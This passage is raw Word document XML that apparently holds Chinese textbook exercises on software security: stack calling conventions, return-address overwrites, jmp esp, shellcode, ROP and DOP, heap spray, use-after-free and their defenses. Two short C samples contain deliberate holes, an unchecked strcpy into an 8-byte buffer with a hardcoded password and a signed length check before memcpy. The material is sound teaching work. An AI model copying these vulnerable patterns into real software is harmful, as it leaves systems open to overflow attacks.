          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_stdcall</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>还是_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_cdecl</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620522C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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）请简单描述一下，在调用函数，以及被函数运行完之后返回的过程中ESP和EBP寄存器的变化及意义。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A151991"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4）请看下面的示例代码，是否含有溢出漏洞，溢出漏洞会导致哪些变量或关键内存区域被覆盖？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1682BCA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代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.23 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有漏洞的示例代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308AFDCC"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p>
    <w:p w14:paraId="5F37536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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>define PASS “123456”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688662AA"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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> login(char* passwd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0683F6F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0FA62817"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nt res;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745CC355"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c</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>har buff[8];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BE90F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hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> num;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACB00CF"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r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>省略部分代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EAD2D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res=strcmp(passwd,PASS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A6C962"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strcpy(buff,passwd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1088A1A0"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r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>省略部分代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AD359D"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return res;//0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录失败，1登录成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EEB49B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57937FB7"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5）1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>节的恶意覆盖返回地址可以如何防护？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50976E6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6）为了防止shellcode被0x00字节截断，选择将返回地址覆盖为jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esp的地址，那么如何获取jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esp指令的地址？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C73B7AA"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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）简述一下Ret2Libc和ROP两种攻击的相同点和不同点？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E59E8D2"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szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）在DOP攻击中，如何更有效的寻找可用的gadgets？如何快速的完成gadgets的拼接？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45A7FE" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248"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9）讨论一下目前针对Ret2Libc和ROP攻击的防御机制，以及它们的优缺点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4A7DBD" w14:textId="448AB357" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）简述一下编写出较为完善的shellcode所需的步骤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C7757F" w14:textId="376996D7" w:rsidR="000012A0" w:rsidRPr="00CA5248" w:rsidRDefault="000012A0" w:rsidP="000012A0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00530B90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00530B90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>既然堆是操作系统分配给进程的内存段，两个程序在动态执行中申请到的堆地址可能是一样的吗？所处物理内存上的物理地址可能是一样的吗？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF34CDE" w14:textId="3829DDA8"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hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连续进行多次堆申请时，获得的堆块首地址是连续的吗，请说明理由。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8E8A5" w14:textId="00D2F0B9"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rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请简述what</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>where的原理，并思考通过何种方式可以防止what</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>where漏洞利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4861CF7E" w14:textId="088A8D46"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rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>试解释表</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2.3</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>描述的常见攻击手段对应的防御技术，分别是什么原理实现防御。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B61EE89" w14:textId="140B4D10"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rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请思考实现Heap</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spray</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，如果地址值与地址上存放的值不一致，有什么后果？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2708EED7" w14:textId="352AB0BF"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hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>试设计算法封装malloc、free等堆操作函数，使得程序员无需考虑内存释放后的野指针问题，可参考C++智能指针的原理和实现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBF6555" w14:textId="3099C9E3"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rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>试分析what→where、Heap</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spray、UAF等堆溢出漏洞利用的局限性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759F1C55" w14:textId="1576E435"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rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="000012A0" w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>试分析下述代码，指出该代码存在的问题，并说明该问题导致的后果是什么？最后指出如何解决该问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740EDA64" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00CA5248" w:rsidRDefault="000012A0" w:rsidP="000012A0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09022781" wp14:editId="32B23CA2">
                <wp:extent cx="5099322" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                <wp:docPr id="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322" cy="1404620"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0F75C6E4"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define BUF_SIZE 10 </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="345BD286"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int main(int argc,char* argv[]) </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="41A83346"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p w14:paraId="6CC3E10A"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int length; char buf[BUF_SIZE]; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="319D29F4"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if (argc != 3) {</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="755F5013"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return -1; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="648FF252"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w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="015012BA"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length = atoi(argv[1]);  </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="77EB225D"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if (length &lt; BUF_SIZE){</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="12923DDA" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00A15875" w:rsidRDefault="000012A0" w:rsidP="000012A0">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:ind w:firstLineChars="400" w:firstLine="840"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00A15875">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t xml:space="preserve">memcpy(buf, argv[2], length); </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0F5BA126" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00A15875" w:rsidRDefault="000012A0" w:rsidP="000012A0">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:ind w:firstLineChars="400" w:firstLine="840"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00A15875">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t xml:space="preserve">printf("Data copied\n"); </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4941F72F"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else { </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="02B4B1C0" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00A15875" w:rsidRDefault="000012A0" w:rsidP="000012A0">
                            <w:pPr>
                              <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                              <w:ind w:firstLineChars="400" w:firstLine="840"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00A15875">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t xml:space="preserve">printf("Too many data\n"); </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6913C6E6"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w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="36C24F95"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txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                        <a:spAutoFit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="09022781" id="_x0000_s1154" type="#_x0000_t202" style="width:4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1z6Ew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9Fvlq9nc04kxSbzvP5cpbakoni6bhDHz4q6FiclBypq0leHB98iOmI4mlLvM2D0fVOG5MW&#10;uK+2BtlRkAN26UsVvNhmLOtLvlrMFknZQjyfzNHpQA41uiv5TR6/0TMRxwdbpy1BaDPOKRNjz3wi&#10;khFOGKqB6Zr0l/Fw5FVBfSJiCKMj6QXRpAX8zVlPbiy5/3UQqDgznyxRX03n82jftJgv3hEihteR&#10;6joirCSpkgfOxuk2JMsnHu6OurPTidtzJuecyWUJ5/lFRBtfr9Ou53e7+QMAAP//AwBQSwMEFAAG&#10;AAgAAAAhAHEBNL3aAAAABQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FLw0AQhe+C/2EZwZvdJGIp&#10;MZtSBC/Sg60ePE6TMZsmOxuzmzb+e0cv9jLweMN73yvWs+vVicbQejaQLhJQxJWvW24MvL89361A&#10;hYhcY++ZDHxTgHV5fVVgXvsz7+i0j42SEA45GrAxDrnWobLkMCz8QCzepx8dRpFjo+sRzxLuep0l&#10;yVI7bFkaLA70ZKnq9pOTkm2opp3/OqbbTn/YbokPr/bFmNubefMIKtIc/5/hF1/QoRSmg5+4Dqo3&#10;IEPi3xVvldyLPBjIsjQDXRb6kr78AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEELXPoT&#10;AgAA/wMAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAHEB&#10;NL3aAAAABQEAAA8AAAAAAAAAAAAAAAAAbQQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAB0BQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="0F75C6E4"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define BUF_SIZE 10 </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="345BD286"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int main(int argc,char* argv[]) </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="41A83346"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p w14:paraId="6CC3E10A"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int length; char buf[BUF_SIZE]; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="319D29F4"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if (argc != 3) {</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="755F5013"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return -1; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="648FF252"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w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="015012BA"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length = atoi(argv[1]);  </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="77EB225D"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if (length &lt; BUF_SIZE){</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="12923DDA" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00A15875" w:rsidRDefault="000012A0" w:rsidP="000012A0">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLineChars="400" w:firstLine="840"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00A15875">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t xml:space="preserve">memcpy(buf, argv[2], length); </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0F5BA126" w14:textId="77777777" w:rsidR="000012A0" w:rsidRPr="00A15875" w:rsidRDefault="000012A0" w:rsidP="000012A0">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLineChars="400" w:firstLine="840"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00A15875">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
